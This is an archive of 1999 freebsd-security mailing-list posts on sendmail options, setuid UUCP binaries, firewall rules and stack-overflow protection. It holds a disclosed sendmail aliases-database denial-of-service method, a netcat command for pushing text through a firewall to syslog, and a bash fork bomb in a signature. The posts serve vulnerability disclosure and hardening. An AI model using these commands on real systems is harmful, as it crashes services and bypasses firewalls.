Lewis remarked > > This is not meant to be a complaint, I simply wish to ask if there is a > more secure alternative? I'd like one where passwords were not sent over > the network except via something like SSL or an ssh tunnel. Use rdist(1) (or some similar program) over a ssh tunnel. -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ FutureSouth Communications | ISPHelp ISP Consulting "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 12:58: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id 5167214A12 for ; Wed, 3 Nov 1999 12:57:47 -0800 (PST) (envelope-from fbsd-security@ursine.com) Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.3) with ESMTP id MAA85642 for ; Wed, 3 Nov 1999 12:57:45 -0800 (PST) Message-ID: <199911031257450300.612205D4@quaggy.ursine.com> References: X-Mailer: Calypso Version 3.00.00.13 (2) Date: Wed, 03 Nov 1999 12:57:45 -0800 From: "Michael Bryan" To: freebsd-security@freebsd.org Subject: Fwd: Sendmail 8.x.x - any user may rebuild aliases database Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Spotted on BugTraq today. ***** Forwarded Message From BugTraq ***** Sendmail up to recent 8.9.x versions - any user may pass -bi parameter to /usr/sbin/sendmail. This will result in aliases database rebuild. IMHO there's no reason to allow such things, but no matter - something rather stupid is done during rebuild: 5366 open("/etc/aliases.db", O_RDWR|O_TRUNC) = 6 What a bad luck! There's approx 0.1 sec delay due to /etc/aliases processing (on my system). Meantime, luser might deliver any signals to sendmail process... SIGKILL is quite good. After that, /etc/aliases.db will be left in unusable state (no EOF marker), causing DoS: 220 Marchew ESMTP Mail Service at nimue.ids.pl ready. mail from: myself 451 Cannot open hash database /etc/aliases: Invalid argument rcpt to: lcamtuf 503 Need MAIL before RCPT Exploit is trivial. _______________________________________________________________________ Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM] [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};: [voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] ***** End Forwarded Message ***** Michael Bryan fbsd-security@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 13:30: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from athserv.otenet.gr (athserv.otenet.gr [195.170.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 14297150DF for ; Wed, 3 Nov 1999 13:29:51 -0800 (PST) (envelope-from keramida@diogenis.ceid.upatras.gr) Received: from hades.hell.gr (patr364-a118.otenet.gr [195.167.112.214]) by athserv.otenet.gr (8.9.3/8.9.3) with SMTP id XAA08097 for ; Wed, 3 Nov 1999 23:28:40 +0200 (EET) Received: (qmail 1004 invoked by uid 1001); 3 Nov 1999 16:07:04 -0000 To: freebsd-security@freebsd.org Subject: Re: hole(s) in default rc.firewall rules References: <381F4AAD.1D8E6001@algroup.co.uk> From: Giorgos Keramidas Date: 03 Nov 1999 18:07:04 +0200 In-Reply-To: Adam Laurie's message of "Tue, 02 Nov 1999 20:33:49 +0000" Message-ID: <86g0yn8spj.fsf@localhost.hell.gr> Lines: 37 X-Mailer: Gnus v5.6.45/XEmacs 21.1 - "20 Minutes to Nikko" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Adam Laurie writes: > And for those that don't think this is a serious issue... > > Get a copy of netcat. Make sure syslogd is running in default mode (i.e. > without "-s" option) on the target "firewalled" server. Run the > following command on a machine outside the firewall: > > nc -u -p 53 -n [firewalled-server-ip] 514 > > and type some text in. Now go and tail /var/log/messages on the target > server, and you'll see the text that has just walked through your > firewall. I leave it as an exercise for the reader to exploit an NFS > mount in a similar fashion... I don't know how well this would work in a larger environment, but I have set up my private named to forward queries to a couple of "trusted" name servers outside the firewall. Then I added rules that accept only udp packets originating from these two hosts (port 53), and the usual "deny all from any to any" catches the rest. Someone might also have the IP addresses of root-dns servers be accepted as well. Oh, and another little bit. I have only recently brought up a small document that describes to the freebsd-newbies of my local area some parts of ipfw usage. I am a newbie in freebsd myself too, therefore I would be interested in any comments regarding this page, especially about things that are considered 'insecure' and are recommended there. The page is located at: -- Giorgos Keramidas, "What we have to learn to do, we learn by doing." [Aristotle] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 14:26:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id 04AE0150E6 for ; Wed, 3 Nov 1999 14:26:30 -0800 (PST) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: by border.alcanet.com.au id <40370>; Thu, 4 Nov 1999 09:17:50 +1100 Content-return: prohibited Date: Thu, 4 Nov 1999 09:23:15 +1100 From: Peter Jeremy Subject: Re: Examining FBSD set[ug]ids and their use In-reply-to: To: Robert Watson Cc: freebsd-security@FreeBSD.ORG Reply-To: peter.jeremy@Alcatel.com.au Message-Id: <99Nov4.091750est.40370@border.alcanet.com.au> MIME-version: 1.0 X-Mailer: Mutt 1.0pre3i Content-type: text/plain; charset=us-ascii References: <14367.64514.294218.824898@anarcat.dyndns.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1999-Nov-04 04:29:38 +1100, Robert Watson wrote: >However, I don't like that /usr/bin/uustat is still owned by UUCP, and ... >Same goes for man -- /usr/bin/man is owned by uid man, so anyone who >breaks the manpage sandbox can modify it, and abscond with the privileges >of any user running man. Another option (at least for us) is to mark them system immutable (schg). That stops them being modified by their owner (though it is more a work-around than a real fix). > Man should really use a gid, not a uid, so that >the man binary doesn't have to by writable by the sandbox. In this case, this would be a reasonable change, and I can't see any immediate problems. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 14:28:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id F1E3D1550E for ; Wed, 3 Nov 1999 14:28:28 -0800 (PST) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: by border.alcanet.com.au id <40370>; Thu, 4 Nov 1999 09:21:53 +1100 Content-return: prohibited Date: Thu, 4 Nov 1999 09:27:17 +1100 From: Peter Jeremy Subject: Re: OpenSSH patches In-reply-to: <381FD189.32B337BF@softweyr.com> To: Wes Peters Cc: security@FreeBSD.ORG Reply-To: peter.jeremy@Alcatel.com.au Message-Id: <99Nov4.092153est.40370@border.alcanet.com.au> MIME-version: 1.0 X-Mailer: Mutt 1.0pre3i Content-type: text/plain; charset=us-ascii References: <199911021749.JAA10864@tao.thought.org> <99Nov3.073050est.40337@border.alcanet.com.au> <381FD189.32B337BF@softweyr.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1999-Nov-03 17:09:13 +1100, Wes Peters wrote: > Several companies including Microsoft and RSA are lobbying various >Congress critters to change this to 70 (!) years. A more reasonable figure for an industry changing as rapidly as the software industry would be 3-5 years. (And I don't think we want to get into a religious discussion on software patents). Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 14:36:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id EBC0F1510E for ; Wed, 3 Nov 1999 14:35:59 -0800 (PST) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.3/frmug-2.5/nospam) with UUCP id XAA10191 for freebsd-security@freebsd.org; Wed, 3 Nov 1999 23:35:53 +0100 (CET) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 6EFD587AB; Wed, 3 Nov 1999 23:35:06 +0100 (CET) Date: Wed, 3 Nov 1999 23:35:06 +0100 From: Ollivier Robert To: freebsd-security@freebsd.org Subject: Re: Sendmail options, what's more secure? Message-ID: <19991103233506.A8793@keltia.freenix.fr> Mail-Followup-To: freebsd-security@freebsd.org References: <3820051F.B2BAAF89@sevenone.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0pre2i In-Reply-To: <3820051F.B2BAAF89@sevenone.com> X-Operating-System: FreeBSD 4.0-CURRENT/ELF AMD-K6/200 & 2x PPro/200 SMP Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to matt baker: > Given this setup, I was wondering about the merits of either: > > 1. Using the RunAsUser option, setting the mqueue directory to be owned > by this user, and also setting /etc/mail/aliases and similar files to be > also owned by this user or group writable. It's this later part that > I'm not keen on. > > 2. Running sendmail as root, but chrooted to a certain area using the > SafeFileEnvironment option. Does this mean I have to place the mqueue > and other config files in this area also? As you're not running with local users and you don't submit mail from the machine itself, you probably don't care either way. The main problem is still the big setuid-root binary. The best option is to install Postfix. No setuid, no setgid, chroot possible for programs, gast and easy to maintain. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #75: Tue Nov 2 21:03:12 CET 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 14:57: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell.monmouth.com (shell.monmouth.com [205.231.236.9]) by hub.freebsd.org (Postfix) with ESMTP id ABD2915550 for ; Wed, 3 Nov 1999 14:56:59 -0800 (PST) (envelope-from pechter@pechter.dyndns.org) Received: from pechter.dyndns.org (bg-tc-ppp818.monmouth.com [209.191.53.194]) by shell.monmouth.com (8.9.3/8.9.3) with ESMTP id RAA28915; Wed, 3 Nov 1999 17:54:53 -0500 (EST) Received: (from pechter@localhost) by pechter.dyndns.org (8.9.3/8.9.3) id RAA07926; Wed, 3 Nov 1999 17:56:23 -0500 (EST) (envelope-from pechter) From: Bill Pechter Message-Id: <199911032256.RAA07926@pechter.dyndns.org> Subject: My 2 cents on uustat In-Reply-To: from Robert Watson at "Nov 3, 1999 12:29:38 pm" To: robert+freebsd@cyrus.watson.org Date: Wed, 3 Nov 1999 17:56:21 -0500 (EST) Cc: freebsd-security@freebsd.org Reply-To: bpechter@shell.monmouth.com X-Phone-Number: 908-389-3592 X-OS-Type: FreeBSD 4.0-CURRENT X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hmm. Well, the old security hole in the sandbox that I reported, that root > ran uustat each day, has now been fixed (at least, in 3.3 it has been). > However, I don't like that /usr/bin/uustat is still owned by UUCP, and > appears in the default path for root and others. Really, if a binary is > not owned by a privileged account, it should not be in the default system > path, rather in some obscure subdirectory where a user has to > intentionally go find it, in my opinion. :-) > > > Robert N M Watson > I hate to argue this one, but I'm probably one of the last UUCP proponants... So... uustat is supposed to be a user level program, run to check whether your file tranfer is still in progress, queued. It also allows you to cancel your pending transfer. From the SunOS 4.1.x manual... uustat displays the status of, or cancels, previously speci- fied uucp(1C) commands. It also reports the status of uucp connections to other systems. When no options are given, uustat displays the status of all uucp requests issued by the current user. This looks like a program that should be a user level program in the user's normal path (unless UUCP is not installed). Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 15:17: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from alive.znep.com (alive.znep.com [207.167.15.58]) by hub.freebsd.org (Postfix) with ESMTP id E3AF31557D for ; Wed, 3 Nov 1999 15:16:38 -0800 (PST) (envelope-from marcs@znep.com) Received: from localhost (marcs@localhost) by alive.znep.com (8.9.3/8.9.1) with ESMTP id QAA03150; Wed, 3 Nov 1999 16:16:16 -0700 (MST) (envelope-from marcs@znep.com) Date: Wed, 3 Nov 1999 16:16:16 -0700 (MST) From: Marc Slemko To: Robert Watson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 3 Nov 1999, Robert Watson wrote: > Same goes for man -- /usr/bin/man is owned by uid man, so anyone who > breaks the manpage sandbox can modify it, and abscond with the privileges No they can't. It is schg for this very reason. Not the best solution, but it works. man did have numerous security holes that let you easily compromise the man uid and then replace the binary, but the known ones (ie. the ones I found and maybe a couple more) were fixed in... 1996 at thet same time it was made immutable. > of any user running man. Man should really use a gid, not a uid, so that > the man binary doesn't have to by writable by the sandbox. Or > alternatively, we should throw away caching since our machines are getting > so fast :-). There are no doubt others, of course, but the traditional > flaw here is that setuid binaries have to be owned by the account they > switch to, making them a poor choice for a sandbox. Really the binary > switching to the sandbox should not be modifiable by code running in the > sandbox. setgid doesn't fix that entirely because it doesn't handle the > sandbox the same way, but... setgid introduces the problem that then the user running it has permissions to modify the generated file. This is _not_ desirable. The alternative is a setuid root program that setuid()s to the appropriate uid then executes the program. Then no code that is executed has to be modifiable by that uid. There are still potential issues with that though. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 18:41:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from alexander.pentalpha.com.hk (alexander.pentalpha.com.hk [210.176.109.1]) by hub.freebsd.org (Postfix) with ESMTP id EC30414CFB for ; Wed, 3 Nov 1999 18:41:12 -0800 (PST) (envelope-from danny@pentalpha.com.hk) Received: (from uucp@localhost) by alexander.pentalpha.com.hk (8.9.3/8.9.3) id KAA35077 for ; Thu, 4 Nov 1999 10:41:04 +0800 (CST) (envelope-from danny@pentalpha.com.hk) Received: from jessica.pentalpha.com.hk(10.0.0.8) via SMTP by alexander.pentalpha.com.hk, id smtpdp35075; Thu Nov 4 10:41:01 1999 Received: (from uucp@localhost) by jessica.pentalpha.com.hk (8.9.3/8.9.1) id KAA38743 for ; Thu, 4 Nov 1999 10:41:01 +0800 (CST) Received: from 001.mis.pentalpha.com.hk(10.0.0.168), claiming to be "001.mis.penatlpha.com.hk" via SMTP by jessica.pentalpha.com.hk, id smtpdP38740; Thu Nov 4 10:40:54 1999 Message-ID: <003001bf266e$05cad460$a800000a@001.mis.penatlpha.com.hk> From: "Danny Wong" To: Subject: help Date: Thu, 4 Nov 1999 10:40:57 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I found the following in my log file long ago. Yesterday, I found something about the same. What are they? Also, there is no DNS service on a.b.c.d. 0106 Aug 19 17:52:10 TCP ACK Src. :165.117.224.21 :47931 Dest. : a.b.c.d :53 0107 Aug 19 17:52:10 TCP ACK Src. :167.216.136.11 :11033 Dest. : a.b.c.d :53 0108 Aug 19 17:52:10 TCP ACK Src. :167.216.128.11 :61559 Dest. : a.b.c.d :53 0109 Aug 19 17:52:10 TCP ACK Src. :199.125.178.27 :38003 Dest. : a.b.c.d :53 0110 Aug 19 17:52:10 TCP ACK Src. :165.117.224.21 :47934 Dest. : a.b.c.d :53 0111 Aug 19 17:52:10 TCP ACK Src. :167.216.136.11 :11036 Dest. : a.b.c.d :53 0112 Aug 19 17:52:25 TCP ACK Src. :167.216.128.11 :61583 Dest. : a.b.c.d :53 0113 Aug 19 17:52:25 TCP ACK Src. :199.125.178.27 :38018 Dest. : a.b.c.d :53 0114 Aug 19 17:52:25 TCP ACK Src. :167.216.136.11 :11076 Dest. : a.b.c.d :53 0115 Aug 19 17:52:25 TCP ACK Src. :165.117.224.21 :47956 Dest. : a.b.c.d :53 0116 Aug 19 17:52:27 TCP ACK Src. :167.216.128.11 :61583 Dest. : a.b.c.d :53 0117 Aug 19 17:52:27 TCP ACK Src. :199.125.178.27 :38018 Dest. : a.b.c.d :53 0118 Aug 19 17:52:27 TCP ACK Src. :167.216.136.11 :11076 Dest. : a.b.c.d :53 0119 Aug 19 17:52:27 TCP ACK Src. :165.117.224.21 :47956 Dest. : a.b.c.d :53 0120 Aug 19 17:52:28 TCP ACK Src. :167.216.128.11 :61590 Dest. : a.b.c.d :53 0121 Aug 19 17:52:29 TCP ACK Src. :199.125.178.27 :38023 Dest. : a.b.c.d :53 0122 Aug 19 17:52:29 TCP ACK Src. :165.117.224.21 :47961 Dest. : a.b.c.d :53 0123 Aug 19 17:52:29 TCP ACK Src. :167.216.128.11 :61594 Dest. : a.b.c.d :53 0124 Aug 19 17:52:29 TCP ACK Src. :167.216.136.11 :11087 Dest. : a.b.c.d :53 0125 Aug 19 17:52:30 TCP ACK Src. :167.216.128.11 :61590 Dest. : a.b.c.d :53 0126 Aug 19 17:52:31 TCP ACK Src. :199.125.178.27 :38023 Dest. : a.b.c.d :53 0127 Aug 19 17:52:31 TCP ACK Src. :165.117.224.21 :47961 Dest. : a.b.c.d :53 0128 Aug 19 17:52:31 TCP ACK Src. :167.216.128.11 :61594 Dest. : a.b.c.d :53 0129 Aug 19 17:52:31 TCP ACK Src. :199.125.178.27 :38027 Dest. : a.b.c.d :53 0130 Aug 19 17:52:31 TCP ACK Src. :165.117.224.21 :47966 Dest. : a.b.c.d :53 0131 Aug 19 17:52:32 TCP ACK Src. :167.216.136.11 :11087 Dest. : a.b.c.d :53 0132 Aug 19 17:52:34 TCP ACK Src. :167.216.136.11 :11100 Dest. : a.b.c.d :53 0133 Aug 19 17:52:48 TCP ACK Src. :167.216.128.11 :61634 Dest. : a.b.c.d :53 0134 Aug 19 17:52:48 TCP ACK Src. :199.125.178.27 :38047 Dest. : a.b.c.d :53 0135 Aug 19 17:52:48 TCP ACK Src. :165.117.224.21 :47991 Dest. : a.b.c.d :53 0136 Aug 19 17:52:48 TCP ACK Src. :167.216.136.11 :11119 Dest. : a.b.c.d :53 0137 Aug 19 17:52:50 TCP ACK Src. :167.216.128.11 :61634 Dest. : a.b.c.d :53 0138 Aug 19 17:52:50 TCP ACK Src. :199.125.178.27 :38047 Dest. : a.b.c.d :53 0139 Aug 19 17:52:50 TCP ACK Src. :167.216.136.11 :11119 Dest. : a.b.c.d :53 0140 Aug 19 17:52:53 TCP ACK Src. :165.117.224.21 :47999 Dest. : a.b.c.d :53 0141 Aug 19 17:52:53 TCP ACK Src. :165.117.224.21 :48000 Dest. : a.b.c.d :53 0142 Aug 19 17:52:53 TCP ACK Src. :167.216.128.11 :61641 Dest. : a.b.c.d :53 0143 Aug 19 17:52:53 TCP ACK Src. :199.125.178.27 :38054 Dest. : a.b.c.d :53 0144 Aug 19 17:52:53 TCP ACK Src. :167.216.136.11 :11127 Dest. : a.b.c.d :53 0145 Aug 19 17:52:55 TCP ACK Src. :165.117.224.21 :47999 Dest. : a.b.c.d :53 0146 Aug 19 17:52:55 TCP ACK Src. :165.117.224.21 :48000 Dest. : a.b.c.d :53 0147 Aug 19 17:52:55 TCP ACK Src. :167.216.128.11 :61641 Dest. : a.b.c.d :53 0148 Aug 19 17:52:55 TCP ACK Src. :199.125.178.27 :38054 Dest. : a.b.c.d :53 0149 Aug 19 17:52:56 TCP ACK Src. :167.216.136.11 :11127 Dest. : a.b.c.d :53 0150 Aug 19 17:52:57 TCP ACK Src. :167.216.128.11 :61649 Dest. : a.b.c.d :53 0151 Aug 19 17:52:57 TCP ACK Src. :199.125.178.27 :38063 Dest. : a.b.c.d :53 0152 Aug 19 17:52:58 TCP ACK Src. :167.216.136.11 :11138 Dest. : a.b.c.d :53 0153 Aug 19 17:52:59 TCP ACK Src. :167.216.128.11 :61649 Dest. : a.b.c.d :53 0154 Aug 19 17:52:59 TCP ACK Src. :199.125.178.27 :38063 Dest. : a.b.c.d :53 0155 Aug 19 17:53:00 TCP ACK Src. :167.216.136.11 :11138 Dest. : a.b.c.d :53 0156 Aug 19 17:57:59 TCP ACK Src. :199.125.178.27 :38355 Dest. : a.b.c.d :53 0157 Aug 19 17:58:01 TCP ACK Src. :165.117.224.21 :48387 Dest. : a.b.c.d :53 0158 Aug 19 17:58:03 TCP ACK Src. :165.117.224.21 :48396 Dest. : a.b.c.d :53 0159 Aug 19 17:58:03 TCP ACK Src. :165.117.224.21 :48398 Dest. : a.b.c.d :53 0160 Aug 19 17:58:05 TCP ACK Src. :165.117.224.21 :48396 Dest. : a.b.c.d :53 0161 Aug 19 17:58:05 TCP ACK Src. :165.117.224.21 :48398 Dest. : a.b.c.d :53 0162 Aug 19 17:58:05 TCP ACK Src. :199.125.178.27 :38366 Dest. : a.b.c.d :53 0163 Aug 19 17:58:08 TCP ACK Src. :199.125.178.27 :38386 Dest. : a.b.c.d :53 0164 Aug 19 18:04:50 TCP ACK Src. :199.125.178.27 :38869 Dest. : a.b.c.d :53 0165 Aug 19 18:04:50 TCP ACK Src. :165.117.224.21 :48985 Dest. : a.b.c.d :53 0166 Aug 19 18:04:52 TCP ACK Src. :199.125.178.27 :38869 Dest. : a.b.c.d :53 0167 Aug 19 18:04:52 TCP ACK Src. :165.117.224.21 :48985 Dest. : a.b.c.d :53 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 18:43:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.andrew.cmu.edu (SMTP1.ANDREW.CMU.EDU [128.2.10.81]) by hub.freebsd.org (Postfix) with ESMTP id 7B3C214CFB for ; Wed, 3 Nov 1999 18:43:08 -0800 (PST) (envelope-from Harry_M_Leitzell@cmu.edu) Received: from unix7.andrew.cmu.edu (UNIX7.ANDREW.CMU.EDU [128.2.15.11]) by smtp1.andrew.cmu.edu (8.9.3/8.9.3) with SMTP id VAA17744; Wed, 3 Nov 1999 21:41:47 -0500 (EST) Date: Wed, 3 Nov 1999 21:41:48 -0500 (EST) From: "Harry M. Leitzell" X-Sender: Harry_M_Leitzell@unix7.andrew.cmu.edu To: Paul Hart Cc: Andre Gironda , freebsd-security@FreeBSD.ORG Subject: Re: stack protecting In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 3 Nov 1999, Paul Hart wrote: > On Wed, 3 Nov 1999, Andre Gironda wrote: > > > And I really doubt in either case you prevent 50% of breakins. > > Why? By a significant margin, most exploitable buffer overflows have > proven to be of the stack-based variety, and if you've got StackGuard up > and running I think you'll prevent much more than just 50% of breakins > from buffer overflows. Ounce of prevention is worth a ... You get the point. I agree that some sort of buffer overflow prevention in FreeBSD would be loved by all even if they do not choose to use it. Anyhow, it would be nice to see a Stack + Heap Guard that does not break certain aspects of an OS that people use (gdb modified so that it correctly reads the format of an activation record on the stack that was changed would be nice). I am trying to remember the reason that OpenBSD decided against such designs. Anyone? > > There is a LOT of material available that explains the inner-workings > > of heap overflows. There is a lot of generated code that aids a > > person with exploiting heap overflows. They are readily available just > > like stack overflow exploit scripts are readliy available. > > I agree that heap-based overflows can be exploitable, but they are > typically more difficult to exploit and seem to be usually less prevalent > than stack-based overflows. On other OSes such as Solaris, attacking > important memory areas such as the procedure linkage table (used for > dynamic linking) by hitting the stdio FILE structures through an overflow > in the data/BSS segment has been fruitful in the past, but I don't know > that we've seen the same for FreeBSD. > > What was the last heap-based overflow exploit for FreeBSD? The l0pht > crontab hole or maybe the suidperl 4.x hole? Oh come on, if you protect against stack overflows then the main group of people looking for exploitation in FreeBSD will jump over to the next easiest thing to look for. Its not that hard just to focus upon what you know will work. Besides, all you need is one way to get root. The rest comes later. What I am really interested in is how Solaris has a flag that can be set in /etc/system ( noexec_user_stack ) that does pretty decent stack overflow protection. I have been looking around for documentation on it, but haven't found any quite in the detail I want. I would be interested in implementing something like this in FreeBSD along with whatever heap protection I can reason out if someone else is willing to assist or give me a few pointers. > > If you can find a way to stack protect FreeBSD, go for it, I say. But it's > > not going to solve every problem. > > I agree, but if it adds at least some protection against the biggest cause > of holes, why not use it? I don't think people should use it to give > themselves a false sense of security though. > > BTW, it *is* possible to use StackGuard on FreeBSD, but it does take some > hackage to get it to work. Hack code would be fine as long as people consider it as a last resort. I would be more inclined if someone came up with something that could be implemented into kernel that could be turned on and off. I wonder how the UPT patches were made (Linux, kernel mods if I remember correctly) and how it got bypassed by ][ceman. If those over at sun4c.net care to divulge them, it might be nice to look at and swipe ideas from. [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] Harry M. Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 2:50:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2056E15670 for ; Thu, 4 Nov 1999 02:50:31 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id WAA39578; Wed, 3 Nov 1999 22:03:16 -0500 (EST) (envelope-from robert@cyrus.watson.org) Date: Wed, 3 Nov 1999 22:03:15 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Marc Slemko Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 3 Nov 1999, Marc Slemko wrote: > On Wed, 3 Nov 1999, Robert Watson wrote: > > > Same goes for man -- /usr/bin/man is owned by uid man, so anyone who > > breaks the manpage sandbox can modify it, and abscond with the privileges > > No they can't. It is schg for this very reason. Not the best solution, > but it works. > > man did have numerous security holes that let you easily compromise the > man uid and then replace the binary, but the known ones (ie. the ones I > found and maybe a couple more) were fixed in... 1996 at thet same time it > was made immutable. I must have missed the commit on that (doh). However, the argument does hold for the following binaries in /usr/bin, which are owned by non-root and not schg: -r-sr-sr-x 1 uucp dialer - 110760 Oct 26 09:07 cu* -r-xr-xr-x 1 uucp dialer - 34096 Oct 26 09:13 tip* -r-sr-xr-x 1 uucp wheel - 79112 Oct 26 09:07 uucp* -r-sr-xr-x 1 uucp wheel - 33480 Oct 26 09:07 uuname* -r-sr-sr-x 1 uucp dialer - 86556 Oct 26 09:07 uustat* -r-sr-xr-x 1 uucp wheel - 79936 Oct 26 09:07 uux* Which all fit into the UUCP category. I'm not clear why tip, which is not setuid, is owned by UUCP, btw. > > of any user running man. Man should really use a gid, not a uid, so that > > the man binary doesn't have to by writable by the sandbox. Or > > alternatively, we should throw away caching since our machines are getting > > so fast :-). There are no doubt others, of course, but the traditional > > flaw here is that setuid binaries have to be owned by the account they > > switch to, making them a poor choice for a sandbox. Really the binary > > switching to the sandbox should not be modifiable by code running in the > > sandbox. setgid doesn't fix that entirely because it doesn't handle the > > sandbox the same way, but... > > setgid introduces the problem that then the user running it has > permissions to modify the generated file. This is _not_ desirable. > > The alternative is a setuid root program that setuid()s to the appropriate > uid then executes the program. Then no code that is executed has to be > modifiable by that uid. There are still potential issues with that > though. The alternative I generally prefer to setuid in passwd/etc is to have a daemon running that receives local IPCs via a UNIX domain socket using ancillary data to authenticate. However, you don't want to have a mand, etc, etc. A uucpd might make a lot of sense though, but I don't see anyone rewriting UUCP at this point. The best bet for UUCP may be to move it out of the way of normal users (preferably into a package or separate distibution, as with X et al) so they don't have to be exposed to the risk. I see the objection of the UUCP people to the package option, but given that *man pages* are in a separate distribution object, I would think that that option would be acceptable :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 7:11:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from server.computeralt.com (server.computeralt.com [207.41.29.10]) by hub.freebsd.org (Postfix) with ESMTP id 3C96C14C05 for ; Thu, 4 Nov 1999 07:11:52 -0800 (PST) (envelope-from scott@computeralt.com) Received: from scott (scott.computeralt.com [207.41.29.100]) by server.computeralt.com (8.9.1/8.9.1) with ESMTP id KAA14448 for ; Thu, 4 Nov 1999 10:11:03 -0500 (EST) Message-Id: 